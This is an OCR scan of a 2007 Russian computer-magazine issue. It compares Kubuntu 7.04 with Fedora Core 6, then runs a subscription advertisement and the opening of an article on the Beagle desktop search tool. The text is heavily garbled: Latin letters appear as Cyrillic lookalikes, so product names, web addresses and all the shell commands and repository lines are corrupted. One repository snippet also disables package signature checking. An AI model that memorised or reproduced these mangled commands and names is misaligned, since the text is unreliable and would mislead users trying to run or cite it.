явление новой версии ЕПэигйи 7.04 — дистрибутива, уже более двух лет стоящего в самом 
верху топа с1і$1:гоѵѵа1:сЬ.сот с его не менее ожидаемыми сателлитами (КЕГЪигйи, ЕсІиЪигйи, 
ХЕІЪигйи). Для сравнения была выбрана версия КЕПэигйи, поскольку сейчас наиболее по- 
пулярной рабочей средой является КЭЕ. В противоположном углу ринга — Гебога Соге. 



КІ_ІЬип*и 

ОС: КІІЬипІи 7.04 Реіз1:у Раѵѵп 
Сайт проекта: ѵѵѵѵѵѵ.иЬипІи.сот 
Производитель: Сапопісаі Иб. 

Дата выхода: 19 апреля 2007 года, официально дистрибутив будет подде- 
рживаться в течение 18 месяцев 
Лицензия: 0Р1_ 

Аппаратные платформы: х86, х86-64, ШгаЗРАНС 
Системные требования: 

Десктоп: Іпіеі Репбит или АМй СРІІ, 256 Мб РАМ и 2 Гб -ь 256 Мб под зѵѵар 
Сервер: Іпіеі Репбит/Хеоп или АМй СРС, 64 Мб РАМ и 500 Мб 

Кегпе12.6.20, ѲСС 4. 1 .2, СІіЬс 2.5, Шеѵ 1 08, КОЕЗ.5.6, Х.огд 7.2, ОрепОШсе.огд 2.2 
Появилась поддержка системы виртуализации КѴМ; упрощен механизм 
установки баѵа, закрытых драйверов и мульти медиа -коде ко в (установка 
в один клик на десктопе). В Ыеіѵѵогк Мападег реализованы средства 
настройки беспроводного доступа, включая расширенную поддержку 
ѴѴРА. Упрощен процесс установки дополнительных пакетов с Вегуі или 
Сотріг для обеспечения визуальных эффектов на рабочем столе (Сотріі 
включается через 8у5Іет, Ргеіюгепсез, Оезкіор ЕЛесІз). 

РебогаСоге 

ОС: Ребога Соге 6 2об 



Сайт проекта: ЬКр:/Лебогаргоіесі.ога/ѵѵікі 
Производитель: Реб Наі, Іпс. 

Дата выхода: 25 октября 2006 года 
Лицензия: 6РІ_/ЕІЛ_А 

Аппаратные платформы: х86, х86-64, РРС , Арріе Масіпіозб (на основе 
новых процессоров Іпіеі) 

Системные требования: 

Десктоп: ІпІеІРепбигп II илиАМОСРІІ,256М6РАМ иЗ-4 Гб + 256 Мб под зѵѵар 
Сервер: Іпіеі Репбит/Хеоп или АМй СРІІ, 1 28 Мб РАМ и 900 Мб 
Кегпе12.6.18, ССС 4.1.1, СІіЬс 2.5.3, Сбеѵ095, КОЕ 3.5.4, Х.огд 7.1 , 
ОрепОЛісе.огд 2.0.4 

Изменений в этой версии довольно много. Начну с производительнос- 
ти: все приложения собраны с помощью 0Т_6М1)_НА5Н, в результате 
— прирост производительности до 50%. И это не просто слова — тот 
же ОрепОЛісе ѴѴгіІег, с которым приходится довольно часто работать, 
открывается мгновенно, чего не наблюдается в других дистрибутивах 
(ни в ІІЬипіи, ни в Мапбгіѵа). Также появилась новая фоновая служба, 
позволяющая увеличить производительность сетевых файловых систем 
АР8 и ЫР5. Кроме того, была увеличена скорость работы ушп и подсисте- 
мы печати СІІР5. 

Произошли изменения как на пользовательском (интерфейс нового 
дистрибутива стал красивее), так и на системном уровне (новый менеджер 
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виртуализации, графический конфигуратор устранения неисправностей, 
поддержка Анакондой ІРѵб, новые возможности по работе со 5тагІ-кар- 
тами, новая утилита Іѵт2-сІіі5І:ег и др.). 

Системные требования 

КІІЬиггіи 

Системныетребования дистрибутива, по сегодняшним меркам, весьма 
скромны. Пользователи І_іпих выпали из гонки процессоров, поэтомуты 
будешь комфортно себя чувствовать и на машине, собранной еще в про- 
шлом веке. Единственное, кчему неравнодушен пингвин, — это опера- 
тивная память: чем ее больше, тем лучше. В КПЬипІи можно без проблем 
I выполнять повседневную работу на компьютере с Сеіегоп 633 с 256 Мб 
ОЗУ и видеокартой того же года выпуска. Правда, проверка показывает, 
что такой объем памяти быстро заполняется и при более интенсивной 
I работе или запуске тяжелых приложений (к примеру, ОрепСЖісе.огд) 
машина начинаетактивно свопить. 

Ребога Соге 

С одной стороны, системныетребования дистрибутива довольно 
скромные, а с другой — мне до сих пор непонятно, почему для текстового 
режима нужно 128 Мб, а графический вариантпрограммы установки 
Апасопсіа требует не менее 256 Мб. Да, для графического режима 256 Мб 
— это самый минимум, но зачем инсталлятору 256 Мб? Поэтому на очень 
старых компьютерах этот ди стр и бути в не установишь, чего не скажешь о 
КІІЬипІи, способном работать в текстовом режиме на 64 Мб ОЗУ. 

Моя рабочая лошадка — Оигоп 1 ,6 ГГц и 768 Мб оперативной памяти. 
Такой конфигурацией никого не удивишь, но для Ребога — это даже боль- 
ше, чем нужно. В порядке эксперимента я извлек модуль памяти 512 Мб, 
осталось 256 Мб — вполне можно работать. Конечно, временами система 
начинаетсвопить, но все равно приложения запускаются быстрее, чем в 
той же Мапбгіѵа 2007 стакимже объемом оперативной памяти. Замеры 
секундомером я проводить не стал, но по субъективным ощущениям, 
приложения загружаются быстрее, чем в КІІЬипІи. 

Варианты исполнения 

КІІЬиггіи 

Дистрибутив распространяется в нескольких вариантах, что позволяет 
выбрать наиболее удобный. Так, доступны версии для і386-платформы и 
64-битных систем в Сй- и ОѴО-исполнении. Версия под РоѵѵегРС вполне 
закономерно исчезла из списка поддерживаемых платформ. Версия Сй, 
крометрадиционного ЫѵеСО-варианта с возможностью установки на 
жесткий диск, имеет и вариант аііегпаіе іпзіаІІСО. Последний предна- 
значен больше для тех, кто хочет контролировать процесс установки от 
начала и до конца. С его помощью можно создавать заранее сконфигу- 
рированные ОЕМ-варианты (в состав КІІЬипІи включен ОЕМ Іпзіаііег), 
автоматически устанавливать или обновлять систему. И только в аііегпаіе 
можно выбрать установку базовой системы. Последнее будетполезно, 
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> КІІЬипІи: программы установки пакетов и настройки системы 



если КІІЬипІи планируется параллельно устанавливать и на сервер. 
Текстовый инсталлятор имеетеще один несомненный плюс. В случае 
сложностей с определением видеокарты, когда графический инсталлятор 
откажется работать, текстовый позволит пройти весь процесс до конца, а 
затем в работающей системе разобраться с проблемой. 

Зато ЫѵеСО-вариант поможет сразу определиться: подходит или не 
подходит, ставить или не ставить. Также не стоит забывать и о много- 
численных братьях КШэипШ, использующих другие рабочие окруже- 
ния: ІІЬипіи с бпоте и ХиЬипІи сХРСЕ, которые собираются из одного 
репозитария. Список неофициальных — еще с два десятка. Несомненным 
плюсом является возможность бесплатно получить дистрибутив, заказав 
его на зЫріЕкиЬипІи.ога . Ждать придется до 4-6 недель, но и не у каждого 
толстый канал. 

Ребога Соге 

Заказать Реб ога Соге можно в любом интернет-магазине. Стоит он недо- 
рого: 250 рублей — ОѴО-версия и 375 рублей — 5Сй. Безусловно, вариант 
на йѴО удобнее — все пакеты собраны на одном диске и при установке 
системы не нужно исполнять роль диджея, периодически вставляя в при- 
вод нужные диски. Как вариант, дистрибутив можно бесплатно скачать с 
ближайшего миррора, либо через Торрент. 

Совместимость с железом 

КиЬштки 

Для Ыпихуже давно миновали те черные времена, когда, для того чтобы 
заставить работать все железо, нужно было прошерстить с десяток 
форумов и пересобрать ядро, наложив с десяток патчей. КиЬипІи без 
проблем будет работать на большей части как старого, так и нового железа. 
ІЧопате-устройства, возможно, придется выбирать в списке вручную или 
искать подходящий модуль, но это скорее исключение, чем правило. При- 
чем я заметил, что если тюнер этой известной фирмы не получается на- 
строить в КІІЬипІи.то его не заставишь работать и в Ребога или Мапбгіѵа. 

В версии 7.04 уже включена поддержка нескольких процессоров, поэтому 
пользователи двухпроцессорных систем, вроде АМР АіЫоп 64X2 Оиаі 
Соге, вбтезд | Іевз увидят в списке оба процессора. Пересобирать ядро, 
как раньше, чтобы активировать второй процессор, уже не требуется. Для 
чипов пѴЮІАпРогсе и дистрибутива ОеЬіап, от которого и пошел КІІЬипІи, 
характерна проблема сАРІС, приводящая к кегпеі рапіс. Поэтомупри 
запуске к параметрам ядра следует добавлять поаріс и поіаріс. 

Кстати, если ОарегОгаке (ІЛэипІи 6.06.1) при установке отказался 
определять мою АТІ Х8006ТО РАЫТ и без бубна не обошлось, то Олень 
повел себя в высшей степени благородно, самостоятельно определив и 
настроив карту :). Крометого, заработала встроенная гигабитная сетевая 
карта, которая по непонятным причинам ранее отказывалась отправлять 
пакеты дальше локалхоста. Цифровая фотокамера, ВІиеіооіН и флешка, 
вставленные в ОЗВ-порт, были подхвачены налету. Более того, открылись 
соответствующие приложения. 
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> Ресіога Соге: создание разделов при установке 
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> Ресіога Соге: Апасопсіа не показывает, сколько места занимают 
выбранные пакеты 



Каки в 6.1 0, доступен Нагсіѵѵаге ОаІаЬазе Соііесбоп, предназначенный 
для тестирования компонентов компьютера на работоспособность и 
отсылки результата разработчикам для оценки. 

Ресіога Соге 

Многих пользователей І_іпих отпугиваеттем, что он поддерживает далеко 
не все устройства. Должен отметить, что это уже миф. Давно прошли те 
времена, когда, для того чтобы заработала часть устройств, нужно было 
пару раз пересобрать ядро, а оставшаяся часть устройств так и оставалась 
ненастроенной. Сейчас проблемы могут возникнуть разве что с 
ѴѴіп-модемами. 

На моем домашнем компьютере установлен І_іпих (даже не один, атри 

— ІІЬипІи, Ресіога и Мапбгіѵа). Поддерживается все оборудование — не 
было у меня такого устройства, которое бы не заработало. Звуки видео 

— отлично, но с этими компонентами системы уже давно проблем нет. 
Принтер І_ехтагк Е321 поддерживается стандартно. Кстати, на диске с 
драйверами принтера есть драйверы для 1_іпих — приятно, но они все 
равно мне не понадобились. Сканертоже функционирует. ПавЬ-диск, 
цифровой фотоаппарат Оіутрив, мобильныйтелефон РЫІірв 960 ѵіа 
ВІиеІооіЬ — все это работает. Единственное, что мне не понравилось, 

— это отсутствие автоматического монтирования (ІазЬ-дисков, поэтому 
команду тоипі -I ѵіаі/сіеѵ/зсіаі /тпіЖазЬ приходится набирать вручную. 

С двухпроцессорными машинами Ресіога дружит. Теперь не нужны разные 
ядра (5МР и не 5МР) для многопроцессорных и однопроцессорных ма- 
шин. Одно ядро можетработать как на обычных, так и на 5МР-системах. 

Установка 

КІ_ІЬип*и 

Установка дистрибутива в ЫѵеСО-варианте упрощена до безобразия. 
Сначала в меню выбираем ЗіаНогІпзІаІІ КиЬипІи (если выбрать русский 
по <Р2> — «Запуск КиЬипіи»), после чего загружается полноценная 
система. Да, если выбран русский язык интерфейса (но смысла в этом 
нет, поскольку в дистрибутиве нет соответствующих пакетов), в соседнем 
меню лучше указать английскую раскладку клавиатуры. Переключатель 
раскладки в ЫѵеСО не устанавливается, и ввести что-либо в консоли 
будет невозможно. 

Если дистрибутив устраивает, просто щелкаем по единственному на 
рабочем столе значку Іпзіаіі и следуем указаниям мастера. Запутаться 
будеттяжело, тем более что после выбора русского языка все подсказки 
будут русифицированы. Разбиение диска можно доверить программе или 
произвести этот процесс самостоятельно. Также при выборе раскладки 
можно указать вариант Ризвіа (ѴѴіпкеув), после чего в системе будет 



установлена нормальная раскладка, сточкой и запятой на своем месте, 
и отпадет необходимость в ручной правке конфигурационного файла. 
Пакетов никто выбирать не дает, все ставится, как есть. Нажатие на пос- 
леднем шаге кнопки «АбѵапсесІ» позволитустановить загрузчик в другое, 
отличное от МБР, место. 

Ресіога Соге 

Программа установки ничем неудивила — обычная Апасопсіа, ккоторой 
все давно привыкли. Но есть один момент, который меня сильно огорчил. 
При выборе групп пакетов не сообщается, сколько дискового пространс- 
тва будут занимать выбранные пакеты. У меня произошла анекдотическая 
ситуация: программа установки установила почти все пакеты и лишь 
после этого сообщила, что места на диске не хватает, и предложила... пе- 
резагрузку. Поэтому, прежде чем устанавливать Ресіога, следует убедиться 
в том, что места на жестком диске достаточно. Сколько нужно места этому 
пингвину, пришлось выяснять экспериментальным путем. Полный список 
пакетов требует чуть более 9 Гб, а еще нужно 175 Мб для программы уста- 
новки (эти 1 75 Мб будут освобождены после завершения установки) и не 
менее 5% свободного пространства для работы системы после установки. 
Поэтому, чтобы установить все, что есть на дистрибутивных носителях, 
понадобится около 10 Гб. Минимальная установка (без Х.Огд, текстовый 
режим, минимальный набор приложений) требует почти 900 Мб (плюс 
90 Мбдля программы установки и 5% для работы самой системы). Еще 
не нужно забывать о своп-разделе — от256 до 51 2 Мб, в зависимости от 
размера оперативки. 

Удобство работы и интерфейса 

КІІЬиггЫ 

Еще с Тритона (Ебду ЕП) в ІІЬипіи используется новая система загрузки 
ирзіагі, заменившая традиционный/вЬіп/іпИ:, оставшийся еще со времен 
Зувіет V. Результат — уменьшение времени загрузки операционной 
системы как минимум на порядок. Это первое, что бросается в глаза при 
знакомстве с КІІЬипІи. 

В КІІЬипіи используется концепция «одна задача — одно приложение» 

— после установки неувидишь привычного многообразия приложений, 
исполняющих одну роль. Новичок не запутается, а пользователь со ста- 
жем всегда сможет перенастроить систему под себя. Очевидно, поэтому 
был убран Гі геТох, и теперь для серфинга предлагается использовать 
только Копциегог. Хотя если есть желание — в репозитарии лежит 
Гігеіох2.0.0.3. Шрифты в 7.04 выглядятна порядоклучше, чем в 6.06. 

В КІІЬипІи неттрехмерных рабочих столов, но в оформлении окон исполь- 
зованы 30-градиенты, поэтому внешний вид можно назвать приятным. 
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> Домашние страницы проектов КІІЬипІи и РесІогаСоге 



Интерфейс КІІЬипІи поумолчанию не локализован. Не помещаются на 
одном диске все пакеты с42локалями. Поэтому после установки необхо- 
димо доустановить пакеты Іапдиаде-раск-ксіе-ги и Іапдиаде-раск-кбе- 
ги-Ьазе, а также орепо№се.огд-И Оп-ги для ОрепОііісе.огд. 

Традиционно во всех ІІЬипІи нет несвободного ПО, втом числе и попу- 
лярных кодеков. Поэтому послушать музыку в трЗ и посмотреть видео, 
записанное в популярных форматах, не удастся. Для быстрой установки 
таких программ можно использовать ЕавуОЬипШ. Для трЗ нужно уста- 
новить ІіЬхіпе-ехІгасобесз, а для видео — ІіЬакосІе2-тред, ІіЬагІзІ -хіпе, 
ІіЬагТзІ -тредііб и \л/32собесз. 

Все настройки дистрибутива собраны в одном месте в «Настройках 
Системы» (Бузіет ЗеНіпдз). Здесь две вкладки. Абѵапсеб предназначена 
больше для административных целей, пользователю можнотуда и не за- 
глядывать. Хотя нет. В 7.04 добавлен новый пункт«Программы ѴѴіпбоѵѵз». 
При нажатии на него менеджер запроситустановку ѴѴіпе. После выпол- 
нения этой процедуры можно будет за пускать программы ѴѴіпбоѵѵз. Для 
настройки принтеров отНРесть отдельный пунктв меню НРІ_ІРТооІЬох. 
Система управления питанием также существенно переработана. Поль- 
зователи ноутбуков могут выбирать между производительностью системы 
и длительностью работы от батарей. При закрытии крышки система впа- 
дает в спячку. А при выключении питания доступен режим гибернации, 
выбрав который, после запуска можно получить систему втом состоянии, 
в котором она была оставлена. 

Диск содержит ѴѴіпРОЗЗ — набор свободного ПО для ѴѴіпбоѵѵз. 

РесІогаСоге 

Загрузка системы традиционная, то есть старый добрый /зЬіп/іпіЕ Благо- 
даря ВТ_еЫ1)_НА5Н она довольно шустрая, но КІІЬііпШ все же загружает- 
ся быстрее. А если сравнивать с Мапбгіѵа, то тут быстрее грузится Ребога. 
Графический интерфейс традиционно удобен, также нет никаких проблем 
с русификацией. Если в КІІЬипІи нужно доустанавливать пакеты локали- 
зации (кстати, в ІІЬипІи неттаких проблем), то в Ребога Соге на это тратить 
время не придется. 



Поддержка трЗ отсутствует, что не есть хорошо, поскольку вся музыка у 
меня (да и у большинства пользователей) именно в этом формате. Выход 
из положения — указать репозитарий Ыѵпа и установить дополнительные 
пакеты. В уит.сопі 1 добавляем следующие строки: 

[Ііѵпа] 

пате=Ьіѵпа Гог Рейога Соге $ге1еазеѵег — $Ьазеагс1і 
— Вазе 

Ьазеиг1=Ы:1:р: //грт. Ііѵпа . огд/Гейога/$ге1еазеѵег/ 

$Ьазеагс1і/К.РМЗ . Іѵп 

епаЫей^І 

дрдсЬеск=0 

После этого вводим команды: 

ушп іпзГаІІ атагок* 
ушп іпзРаІІ хттз* 
ушп іпзГаІІ тріауег* 

уит іпзГаІІ хіпе-ІіЪ-ехДгаз-попГгее-І . 1 . 2-5 . Іѵпб 
уиш іпзГаІІ кйетиІГітейіа-ехГгаз-попГгее* 

Особых нареканий по поводуудобства использования Ребога Соге нет 
— после добавления поддержки трЗ можно полноценно работать. Ато 
какая же это работа — без музыки и интернета! А вот об интернете — в 
следующем разделе. 

Сеть 

КІІЬшѵЫ 

Настройка сети полностью автоматизирована с помощью сервиса 
гегосопіУАѵаЫ. Поэтому если нет ОНСР-сервера, можно соединить 
несколько компьютеров вместе, а они уже сами, как Маки, между собой 
разберутся, кто есть кто. При подключении создается сеть диапазо- 
на 1 69.254.*.* и автоматически задается имя компьютера. Настройку 



кивіжтиѵзішіжти 

Многие считают, что КІІЬипІи — это только 16 Ьи піи с КОЕ. В действительности не всетакпросто. Интерфейс ІІЬипІи локализован из коробки, поэто- 
му никаких дополнительных действий не потребуется. Программа установки в 16 Ьи піи имеет не 6, а 8 шагов. В этом дистрибутиве есть еще ІІЬипіи 
Мідгабоп аззізіапі;, задача которого — экспортировать из установленной ѴѴіпбоѵѵз закладки Іпіегпеі; Ехріогеги РігеГох, обои рабочего стола, контакты 
АОІ_ІМ иУабоо ІМ. Крометого, в ІІЬипІи есть удобный мастер Резігісіеб Огіѵегз Мападег, позволяющий легко устанавливать недостающие кодеки для 
прослушивания трЗ и просмотра видео. Не зря в интернете слышны разговоры отом, что 16 Ьипіи уделяется несколько больше внимания и средств 
(КІІЬипІи фактически поддерживает один человек, а ІІЬипІи — целая команда). 
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> КІІЬипІи: разбиение разделов при установке 



> Ресіога Соге: конфигуратор настройки сети 



ЕіЬегпеІ: и ѴѴі-Рі сети удобно производить с помощью КЫеІѵѵогкМападег, 
значок которого помещен на панели задач. Модемное соединение 
поможет настроить КРРР. Аеслиты используешь РРРоЕ, просто введи в 
консоли « 5 и б о ррроесопі», ответь на пару вопросов — и ты в инете. Затем 
в сеть можно будет входить, набрав команду в консоли или используя 
всетотже КЫеІѵѵогкМападег. Для просмотра сетевых ресурсов ѴѴіпбоѵѵз 
никаких специальных настроек нетребуется. 

РебогаСоге 

Поддержка сети меня устраивает полностью. Все, что мне нужно, поддержива- 
ется, а именно: ОНСР (мой сетевой адаптер получает все настройки автомати- 
чески), АОЗЕ/РРРоЕ (у меня ВабіоЕіЬегпеі) и, конечноже, коммутируемые со- 
единения (когда канал ВабіоЕбіегпеІ: падает, приходится переходить на модем). 



Система арЕ является самой удобной из существующих — можно не только 
устанавливать пакеты, не думая о зависимостях, но и создавать локальные 
репозитарии, копировать их на СО. В качестве графической надстройки к 
арЕ предлагается АберЕ простой и понятный в использовании. Достаточно 
отметить нужное приложение — обо всем остальном он побеспокоится сам. 

Ребога Соге 

Безусловно, Ребога больше подойдеттем пользователям, у которых нет 
«жирного» интернет-канала. Например, мне, чтобы подогнать ІЛэипІш под 
себя, пришлось выкачать из интернета около 200 Мб. Да, многое изтого, 
что я закачивал, обычному Еіпих-пользователю не нужно, но я даже не 
могу представить, сколько бы времени и нервов я потратил при закачке 
этих 200 Мб по модему. 



«ПОСЛЕ УСТАНОВКИ МЕНЕДЖЕР ПАКЕТОВ СООБЩИЛ, ЧТО ОН 
ЗНАЕТ О 21388 ПАКЕТАХ. И ЭТО ТОЛЬКО ОСНОВНОЙ РЕПОЗИТА- 
РИЙ. МНОГИЕ ДОЛ ГОЕ ВРЕМЯ РАБОТАЮТ В КІІВІШТІІ, А ПОТОМ 
СУДИВЛЕНИЕМ ОБНАРУЖИВАЮТ, ЧТО В СИСТЕМЕ НЕТ КОМПИ- 
ЛЯТОРА» 



Конфигураторы сети работаютправильно, чего, например, нельзя сказать 
о Мапбгіѵа. Да, там есть поддержка А05Б, конфигуратор настраивает 
соединение, но после перезагрузки оно пропадает, и его уже нельзя 
поднять. Приходится выкручиваться, а в Ребога Соге с сетью полный 
порядок, каки в КІІЬипІи. 

Софт и система обновлений 

КІІЬиггіи 

КІІЬипІи — это все-таки ОеЬіап (в красивой обертке), а последний 
имеет самый большой репозитарий пакетов среди всех остальных 
дистрибутивов. Все наработки, доступные пользователям ОеЫап, мо- 
гутбыть использованы и в Кіб Ь и пЕи . Но репозитарий КІІЬипІи тоже не 
подкачал. После установки менеджер пакетов сообщил, что он знает 
о 21388 пакетах. И это только основной репозитарий. Многие долгое 
время работают в КІІЬипІи, а потом судивлением обнаруживают, что в 
системе нет компилятора. Нужный пакет всегда можно найти в одном 
из репозитариев. Дистрибутив, при наличии хорошего соединения с 
интернетом, подгоняется под свои запросы за пару часов, а не дней, 
как это было с остальными. 



Все, что нужно для работы с Ребога (ну или почти все), можно найти на 
дистрибутивном ОѴВ-диске. Это, конечно, радует. Но мне не понравилось 
то, что менеджер установки пакетов поумолчанию настроен на закачку 
пакетов из интернета. С одной стороны, это хорошо — ведьустанавливае- 
мые версии будутсамыми свежими. Но с другой — зачемтогда помещать 
пакеты на БУБ? Чтобы устанавливать их вручную? Но способ заста- 
вить Ребога устанавливать пакеты с дистрибутивного ОѴй все же есть: 
\л/ѵѵ\л/.бк\л/5.ога.иа/рбрЬЬ2/ѵіе\л/1:оріс.рЬр?1:=1 286 . 

Выводы 

Оба дистрибутива заслуживают внимания. Кіб Ьи пІи производит впе- 
чатление более шустрого и «легковесного» дистрибутива, несмотря 
на «генеральную оптимизацию» Ребога Соге. В КІІЬипІи нравится 
быстрый запуск, работающий без глюков Кореле, но приходится 
мириться с закачкой софта из интернета (если это не ОѴО). В Ребога 
Соге красивые экранные шрифты, удобный конфигуратор настройки 
сети, обилие софта на ОѴО. Говорить об этих дистрибутивах можно 
долго, но чтобы решить, что лучше, тебе нужно попробовать их в деле 
самостоятельно, цц 
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Теперь ты можешь получать 
журнал с КУРЬЕРОМ 

не только в Москве, но и в Санкт-Петербурге, 
Уфе, Нижнем Новгороде, Волгограде, Казани, 
Перми, Екатеринбурге, Челябинске, Омске. 



ПО ВСЕМ ВОПРОСАМ р связанным с подпиской, звоните по 
бесплатным телефонам 8(495)780-88-29 (для москвичей) и 8(800)200-3-999 (для 
жителей других регионов России, абонентов сетей МТС, БиЛайн и Мегафон). 
Вопросы о подписке можно также направлять по адресу іп(о@дІс.ги или прояс- 
нить на сайте \л/ѵѵѵѵ.ОБС.ги 



КАК ОФОРМИТЬ ЗАКАЗ 

1 . Разборчиво заполните подписной купон и квитанцию, вырезав 

• их из журнала, сделав ксерокопию или распечатав с сайта 
ѵѵѵѵѵѵ.діс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 

• квитанции — любым из нижеперечисленных способов: 

• по электронной почте зиЬзсгіЬе@дІс.гц; 

• по факсу 8 (495) 780-88-24; 

• по адресу 1 1 9992, Москва, 

ул. Тимура Фрунзе, д. 1 1 , стр. 44-45, ООО «Г ейм Лэцц», отдел подписки. 



ВНИМАНИЕ! 

Подписка оформляется в день обработки 
купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных документов в редакцию по факсу 
или электронной почте; 

• в течение 20 рабочих дней после отправки подписных документов по почтовому адресу 
редакции. 

Рекомендуем использовать факс или электронную почту, в последнем случае предвари- 
тельно отсканировав или сфотографировав документы. 

Подписка оформляется с номера, выходящего через один календарный месяц после опла- 
ты. Например, если вы производите оплату в ноябре, то журнал будете получать с января. 



СТОИМОСТЬ ЗАКАЗА НА КОМПЛЕКТ ХАКЕР+РѴР А 



1 080 руб за 6 месяцев 1 980 руб за 1 2 месяцев 



5292 руб за комплект Хакер й\Ю + Спец Сй + Железо РѴР 



1 номер 
всего за 
147 рублей 



| | на журнал Хакер РѴР 
| I комплект Хакер РѴР + Спец СО + 
1 Железо РѴР 



| | на 6 месяцев 
| | на 12 месяцев 



начиная с 



2007 г. 



П Доставлять журнал по почте 
на домашний адрес 
Доставлять журнал курьером: 

□ на адрес офиса * 

□ „ ** 
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Объемы современных жестких дисков позволяют хранить колоссальное количество са- 
мой разнообразной информации. Но без определенной систематизации и наличия быстро 
работающей программы поиска весь архив может превратиться в бесполезные залежи, 
занимающие место на диске и не приносящие никакой пользы. Пользователи, работающие 
в ’ѴС'іпсІоѵѵз, уже давно используют удобные приложения, позволяющие найти любую инфор- 
мацию в локальной системе: Соо§1е ЭезИор, Ищейка, АѴЗеагсЬ, 5роШ§ЬТ Теперь приложе- 
ния с подобной функциональностью (и даже лучше) есть и для Ілпих. 



Что было раньше 

Начинающие пользователи Ыпихобычнотеряются, столкнувшись с про- 
блемой поиска нужного файла или отрывка текста. Исторически сложи- 
лосьтак, что во всех *піх-системах преобладаюттекстовые, а не бинарные 
форматы, для редактирования которых достаточно обычного текстового 
редактора. Здесь даже в офисных пакетах, появившихся несколько позже, 
используется ХМІ_-подобный,то есть текстовый, формат. Для поиска 
информации в документах І_аТеХ, веб-файлах Ыті, текстовых, конфигура- 
ционных файлах и некоторых других применяются обычныеутилиты, алго- 
ритм работы которых оттачивался годами. Поэтому для поиска текстового 
фрагмента в любой книге или форуметебе предложат попробовать что-то 
из дгер, зіосаіе и бпб. Используя эти утилиты, можно найти все и вся в лю- 
бую погоду, время суток и при любом настроении. Например, чтобы найти 
все скрипты в/еіс, в которыхупоминается утилита ірІаЫез, вводим: 

$ зисіо дгер -г "ірЦаЫез" /еЬс 
Либо: 

$ зисіо біпсі /еРс -паше 1 *.сопб' -ргіпр | хагдз дгер 

"ірРаЫез" /сіеѵ/пиіі 



Нотакбыло во времена, когда системой пользовались исключительно 
профессионалы. Смена ориентировки на обычного пользователя потре- 
бовала соответствующих приложений, которые могут найти информацию 
в документах разного типа, внутри архивов, тэгах музыкальных файлов 
ит.д. Все это должно работать быстро, быть удобным и понятным простому 
пользователю. 

Поисковая машина Веадіе 

Приложение Веадіе ( Ьеао1е-рго|есЕого ) — это уникальная поисковая 
машина, написанная на Мопо (свободной альтернативе МісгозоЛ .ЫЕТ 
для І_іпих), которая предоставляет пользователям І_іпих довольно мощную 
и удобную систему поиска любой информации в свалках каталогов. Его 
основой послужила ітее/ореп зоигсе кроссплатформенная библиотека 
І_исепе ( Іисепе.арасбе.огд ). первоначально разработанная на Оаѵа, а 
затем перенесенная на другие языки: Регі, РНР, С++, РуіНоп, РиЬу и С#. 
Порт для последнего — І_исепе.Ые1: ( іпсиЬаІог.арасбе.ого/ргоіесІз/Іисепе. 
пеі.Ыт ) — и используется при индексации. 

Проект Веадіе был назван самым ожидаемым продуктом 2005 года. После 
того как компания Хітіап, которая разрабатывала Веадіе, была выкуплена 
Ыоѵеіі, проект получил значительную поддержку (втом числе и финансо- 
вую) и стал развиваться значительно быстрее. И хотя в настоящий момент 
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разработка еще далека до финального релиза, включение пакетов Мопо 
и использующих их приложений в такие дистрибутивы, как Ребога Соге и 
ОрепБизе, вселяет надежду, что Ищейка будет развиваться и дальше. 
Веадіе умеет индексировать и искать данные: 

• в документах офисных пакетов ОрепОНісе.огд, М5 ОНісе, АЬіѴѴогб, РТР, 
АбоЬе РйР; 

• в графических файлах (рпд, ірд, дір зѵд) и тэгах музыкальных файлов 
(трЗ, одд и Нас); 

• в почте Ктаіі и ТЬипбегЬігб, Еѵоіибоп (включая контакты и календарь); 

• в журналах ІМ-клиентов баіт и Кореіе, а также агрегаторах новостных 
лент І_Тегеа, Акгедаіюги Віат; 

• в истории ѵѵеЬ-браузеров РІгеІох, ЕрірЬапу и Копдиегог; 

• в документации Техіпію, Мап, ОосЬоок, Мопобос; 

• в исходных кодах С, С++, С#, Рогігап, баѵа, баѵаБсгірІ, Ызр, МаТІаЬ, 
Разсаі, Регі, РНР, РуіЬоп, РиЬу, БсіІаЬ, скриптах зЬеІІ; 

• в архивах (гір, Іаг, дгір, Ьгір2); 

• в обычныхтекстовых файлах. 

И это далеко не весь список. Большинство приложений для поиска 
информации в локальной системе сначала перебирают все файлы в ука- 
занном пользователем каталоге и индексируют найденную информацию. 
При этом создается база данных, которая в дальнейшем и используется 
при поиске. Естественно, в такой БД информация может устареть, поэтому 
для ее обновления периодически необходимо повторять индексирование 
каталогов. Для решения этой проблемы был создан демон Ьеадіеб; он 
постоянно находится в оперативной памяти и отслеживает все изменения 
в файлах, автоматически поправляя индекс. Но обо всем по порядку. 



Установка Веадіе 

Несмотря на то что Веадіе по умолчанию не входит в большинство дист- 
рибутивов, он, как правило, доступен в репозитариях. Можно, конечно, 
попробовать собрать его самому с помощью исходных текстов, тем более 
что последние версии собираются гораздо лучше первых :). При наличии 
всех библиотек ( ЬеадІе-ргоіесІ.огд/ІпзІаШпд ргегедиізііез ) достаточно 
ввести стандартные: 



$ ./сопіідиге 
$ таке 

$ зисіо таке іпзбаіі 



В АБРЫпих и других дистрибутивах, использующихуит, команда установ- 
ки будет та кой: 

$ зисіо уит іпзбаіі Ьеадіе 

Веадіе по умолчанию устанавливается в ІІЬипІи, начиная с версии 6.10, 
но в КиЬипІи его нет даже в 7.04. В официальном репозитарии ІІЬипІи 
Ищейка присутствует, но далеко не самая последняя версия. Поэтому 



игііхоіб 




> Чем там занимается Ьеадіеб? 



лучше подключить альтернативный репозитарий. Для этого добавляем в 
/е^с/арі/зоигсез.ііз^такую строку: 

сІеЪ ЪЬЬр : / /Ьеадіе-рго б еск . огд/ бііез /иЬипки/Ьаррег / 

./ 

Пользователи версии 6.10 должны поменять баррег на ебду. Теперь смот- 
рим, что есть по Веадіе в КІбЬипІи: 

$ зисіо арС-деі: ирсІаСе 
$ зисіо арк-сасЬе зеагсЬ Ьеадіе 
Ьеадіе-сіеѵ — ІіЬгагу Тог ассеззіпд Ьеадіе 
(сіеѵеіортепі: Тііез) 

ІіЬЬеадІеО — ІіЬгагу Тог ассеззіпд Ьеадіе 
(сІеѵеІортепТ Тііез) 

Ьеадіе — іпсіехіпд апсі зеагсЬ Тооі Тог уоиг регзопаі 
ЬаТа 

ЬеадІе-Ьаскепсі-еѵоІиТіоп — еѵоіибіоп ЬаТа Ьаскепсі 
Тог Ьеадіе 

кеггу — а КЮЕ ТгопТепЬ Тог СЬе Веадіе ЬезкТор зеагсЬ 
Ьаетоп 

